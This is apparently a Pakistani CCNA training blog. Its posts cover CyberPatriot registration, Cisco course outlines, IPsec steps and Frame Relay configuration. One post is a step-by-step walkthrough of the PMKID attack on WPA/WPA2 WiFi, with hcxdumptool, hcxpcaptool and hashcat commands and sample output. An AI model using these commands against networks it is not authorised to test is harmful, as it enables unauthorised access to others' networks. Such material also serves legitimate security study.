Monday, 27 August 2018

CyberPatriot XI Registration is Open


CyberPatriot season XI is open and will remain open until 3 Oct 2018!  Sponsored by Northrup Gumman, ​​​​the CyberPatriot is a National Youth Cyber Education Program created by the US Air Force Association to inspire K-12 students toward careers in cybersecurity or other science, technology, engineering, and mathematics (STEM) disciplines critical to our future.  While it is a US program, youth from around the world are invited to participate.

To register visit CyberPatriot Registratration -- register as a coach, team, technical mentor, or team assistant. 

Program Benefits Provided by Cisco include: NetLabs (Integration into local and regional Competitions), Skills Development (for Students & Instructors), Online Competition, Cisco Engineers as Local Mentors, the Cisco Networking Challenge, Access to Packet Tracer and Instructor Professional Development.

A focal point of CyberPatriot is the National Youth Cyber Defense Competition. The competition has teams of high school and middle school students acting in the role of newly hired IT professionals tasked with managing the network of a small company.

In the rounds of competition, teams are given a set of virtual images that represent operating systems and are tasked with finding cybersecurity vulnerabilities within the images and hardening the system while maintaining critical services.  Teams compete for the top placement within their state or region, with top teams earning an all-expenses-paid trip to Baltimore, MD for the National Finals Competition where they can earn recognition and scholarship money.​

CyberPatriot is an English-speaking competition based in the US. Visit the CyberPatriot Program Website for more information.


CCNA Classes near me Faisalabad | Hack Wifi using Pairwise Master Key ID (PMKID)




A New Method Discovered to Crack WPA/WPA2 PSK Enabled WiFi Network Passwords


New Attack method discovered to compromise the WPA/WPA2 enabled WiFi networks that allow attackers to gain Pre-shared Key hash that used to crack Passwords used by targeted victims.
This Method is discovered during the attack against the recently released WPA3 security standard which is extremely harder to crack since its used Simultaneous Authentication of Equals (SAE), a modern key establishment protocol.
New WP3 Security Standard released by Wi-Fi Alliance that provides Next-generation Wi-Fi Security with new capabilities to enhance both personal and enterprise networks and the new WP3 security standard that is a successor of WPA2.
Researcher finds this attack to compromise the WPA/WPA2 password without performing EAPOL 4-way handshake.
According to Steube who is the developer of Hashcat password cracking tool, The new attack is performed on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame.
Also, this attack work Against all type of  802.11i/p/q/r networks with roaming functions enabled and it’s unclear how many vendors and how many routers this technique will work.

How Does this WPA/WPA2 WiFi Password Attack Works

Robust Security Network Information Element (RSN IE) is an optional one in 802.11 management frames and its working in a single EAPOL frame.
Pairwise Master Key ID (PMKID) can be captured from RSN IE whenever the user tries to authenticate with the router.

“Here we can see that the PMKID has been captured is computed by using HMAC-SHA1 where the key is the PMK and the data part is the concatenation of a fixed string label “PMK Name”, the access point’s MAC address and the station’s MAC address.”
In order to make use of this new attack you need the following tools:

Step 1

First Run hcxdumptool to gain the  PMKID from the AP  and dump the file in PCAP format using following code.
$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 –enable_status
The output looks like this:
start capturing (stop with ctrl+c)
INTERFACE:……………: wlp39s0f3u4u5
FILTERLIST……………: 0 entries
MAC CLIENT……………: 89acf0e761f4 (client)
MAC ACCESS POINT………: 4604ba734d4e (start NIC)
EAPOL TIMEOUT…………: 20000
DEAUTHENTICATIONINTERVALL: 10 beacons
GIVE UP DEAUTHENTICATIONS: 20 tries
REPLAYCOUNTER…………: 62083
ANONCE……………….: 9ddca61888470946305b27d413a28cf474f19ff64c71667e5c1aee144cd70a69

Step 2

Run next tool called hcxpcaptool to convert the captured data from pcapng format to a hash format accepted by hashcat using following code.
$ ./hcxpcaptool -z test.16800 test.pcapng
The content of the written file will look like this and it split into 4 columns.
PMKID * MAC AP * MAC Station * ESSID
2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a
Also, Researcher recommends that, While not required it is recommended to use options -E -I and -U with hcxpcaptool. We can use these files to feed hashcat. They typically produce good results.
  • -E retrieve possible passwords from WiFi-traffic (additional, this list will include ESSIDs)
  • -I retrieve identities from WiFi-traffic
  • -U retrieve usernames from WiFi-traffic
$ ./hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng

Step 3 

Finally, Run hashcat to crack it, we need to use the hash mode PMKID -16800 and we can be used this hash as any other hash type using following code,
$ ./hashcat -m 16800 test.16800 -a 3 -w 3 ‘?l?l?l?l?l?lt!’
Finally, it cracked the hash  WPA-PMKID-PBKDF2
When we look at previously available WiFi attacks, we need to sit back and wait until the target user logged in later we can crack the key by capturing the four-way handshake.
In order to get access to the PMKID, this new attack simply has to attempt to authenticate to the wireless network later we can easily crack the pre-shared key.
Also, this method is much easier to access the hash that contains the pre-shared key and later moment the hash will be cracked, also this attack is little complex based on the complexity of the password.


Saturday, 25 August 2018

CCNA Classes Faisalabad | First step toward a networking career

CCNA R&S: Introduction to Networks

By Cisco Networking Academy

Begin preparing for a networking career with this introduction to how networks operate. This includes learning the architecture, structure, and functions needed to support the operations and priorities of Fortune 500 companies to small innovative retailers. You will even get the chance to configure a network yourself, such as a simple LAN (Local Area Network). After completing this course, you will have a working knowledge of routing, switching, network applications and protocols. This is the first course in a 4-course series designed to prepare you for entry-level networking jobs. No prerequisites required.

Length:  70 hours
Cost: Registration Fee Only
Level: IntermediateLearning Type: Instructor-led

CCNAGuru
+92-301-7640931
Get Online TRaining and Certifications

Sunday, 12 August 2018

CCNA Classes in Faisalabad | Cisco Networking Academy

Get CCNA 200-125 Training and Coaching by Cisco Certified Instructors only in Faisalabad at Cisco Networking Academy

5 days per week class

90 minutes session

100% Lab

Cisco Official Account for Every CCNA Student

Get Free discount voucher after academy exams

Cisco Networking Academy Faisalabad

Students at Cisco Training Center Faisalabad

Cisco Academy Faisalabad

The Cisco Networking Academy® CCNA Routing and Switching curriculum is designed for students who are seeking entry-level ICT jobs or plan to pursue more specialized ICT skills.
CCNA Routing and Switching provides comprehensive coverage of networking topics, from fundamentals to advanced applications and services, with opportunities for hands-on practical experience and career skills development.
Cisco Certifications Students will be prepared to take the Cisco CCENT® certification exam after completing a set of two courses and the CCNA® Routing and Switching certification exam after completing a set of four courses.
Features and Benefits The CCNA Routing and Switching curriculum offers the following features and benefits:
´        Students learn the basics of routing, switching, and advanced technologies to prepare for the CCENT and CCNA certification exams, networking related degree programs, and entry-level careers.
´        The language used to describe networking concepts is designed to be easily understood by learners at all levels and embedded interactive activities help reinforce comprehension.
´        Courses emphasize critical thinking, problem solving, collaboration, and the practical application of skills.
´        Multimedia learning tools, including videos, games, and quizzes, address a variety of learning styles and promote increased knowledge retention.
´        Hands-on labs and Cisco® Packet Tracer simulation-based learning activities help students develop critical thinking and complex problem solving skills.
´        Embedded assessments provide immediate feedback to support the evaluation of knowledge and acquired skills.

Course Description
CCNA Routing and Switching teaches comprehensive networking concepts, from network applications to the protocols and services provided to those applications by the lower layers of the network. Students will progress from basic networking to more complex enterprise and theoretical networking models later in the curriculum.
 There are four courses in the recommended sequence:
´        Introduction to Networks
´        Routing and Switching Essentials
´        Scaling Networks
´        Connecting Networks
In each course, Networking Academy™ students will learn technology concepts with the support of interactive media and apply and practice this knowledge through a series of hands-on and simulated activities that reinforce their learning.

Introduction to Networks
Description:
Introduces the architecture, structure, functions, components, and models of the Internet and other computer networks. The principles and structure of IP addressing and the fundamentals of Ethernet concepts, media, and operations are introduced to provide a foundation for the curriculum. By the end of the course, students will be able to build simple LANs, perform basic configurations for routers and switches, and implement IP addressing schemes.
Detail:
Describe the devices and services used to support communications in data networks and the Internet
Describe the role of protocol layers in data networks
Describe the importance of addressing and naming schemes at various layers of data networks in IPv4 and IPv6 environments
Design, calculate, and apply subnet masks and addresses to fulfill given requirements in IPv4 and IPv6 network
Build a simple Ethernet network using routers and switches
Use Cisco command-line interface (CLI) commands to perform basic router and switch configurations

Routing and Switching Essentials
Description:
Describes the architecture, components, and operations of routers and switches in a small network. Students learn how to configure a router and a switch for basic functionality. By the end of this course, students will be able to configure and troubleshoot routers and switches and resolve common issues with static route, RIPv2, VLAN, NAT,ACL, DHCP in both IPv4 and IPv6 networks, and perform device discovery, management and maintenance.
Detail:
Determine how a router will forward traffic based on the contents of a routing table.
Explain how switching operates in a small to medium-sized business network.
Use monitoring tools and network management protocols to troubleshoot data networks.
Implement access control lists (ACLs) to filter traffic.
Configure and troubleshoot VLANs and routing with static route and RIPv2.
Describe the operations of Dynamic Host Configuration Protocol for IPv4 and IPv6

Scaling Networks
Description:
Describes the architecture, components, and operations of routers and switches in a large and complex network. Students learn how to configure routers and switches for advanced functionality. By the end of this course, students will be able to configure and troubleshoot routers and switches and resolve common issues with OSPF, EIGRP, STP, and VTP in both IPv4 and IPv6 networks. Students will also develop the knowledge and skills needed to implement DHCP and DNS operations in a network.
Detail:
Configure and troubleshoot DHCP and DNS operations for IPv4 and IPv6
Describe the operations and benefits of the Spanning Tree Protocol (STP)
Configure and troubleshoot STP operations
Describe the operations and benefits of link aggregation and Cisco VLAN Trunk Protocol (VTP)
Configure and troubleshoot basic operations of routers in a complex routed network for IPv4 and IPv6
Configure and troubleshoot advanced operations of routers and implement RIP, OSPF, and EIGRP routing protocols for IPv4 and IPv6
Manage Cisco IOS® Software licensing and configuration files

Connecting Networks
Description:
Discusses the WAN technologies and network services required by converged applications in a complex network. The course enables students to understand the selection criteria of network devices and WAN technologies to meet network requirements. Students learn how to configure and troubleshoot network devices and resolve common issues with data link protocols. Students also develop the knowledge and skills needed to implement IPSec and virtual private network (VPN) operations in a complex network
Detail:
Describe the operations and benefits of virtual private networks (VPNs) and tunneling
describe different WAN technologies and their benefits
Configure and troubleshoot serial connections
Configure and troubleshoot broadband connections
Configure and troubleshoot IPSec tunneling operations
Monitor and troubleshoot network operations using syslog, SNMP, and NetFlow

Design network architectures for borderless networks, data centers, and collaboration

Sunday, 12 February 2017

CCNA Security Training in Faisalabad

Implementing Cisco Network Security Exam (210-260)


Security Concepts
Secure Access
VPN
Secure Routing and Switching
Cisco Firewall Technologies
IPS
Content and Endpoint Security

whatsapp   +92-301-7640931      https://www.career.edu.pk

Friday, 6 January 2017

IPsec VPN Negotiation: CCNA Security Training and Exams


Step 1 - Host A sends interesting traffic to Host B.
Step 2 - R1 and R2 negotiate an IKE Phase 1 session.
Step 3 - R1 and R2 negotiate an IKE Phase 2 session.
Step 4 - Information is exchanged via IPsec tunnel.
Step 5 - The IPsec tunnel is terminated.



Thursday, 3 November 2016

Configuring Frame Relay CCNA Training in Faisalabad


Configuring Frame Relay
-------------------------------
Router(config-if)# encapsulation frame relay [cisco | ietf]
Router(config-if)# bandwidth kbps
Router(config-if)# frame-relay lmi-type [cisco | q933a | ansi]
Router(config-if)# frame-relay map [protocol][network address][dlci] broadcast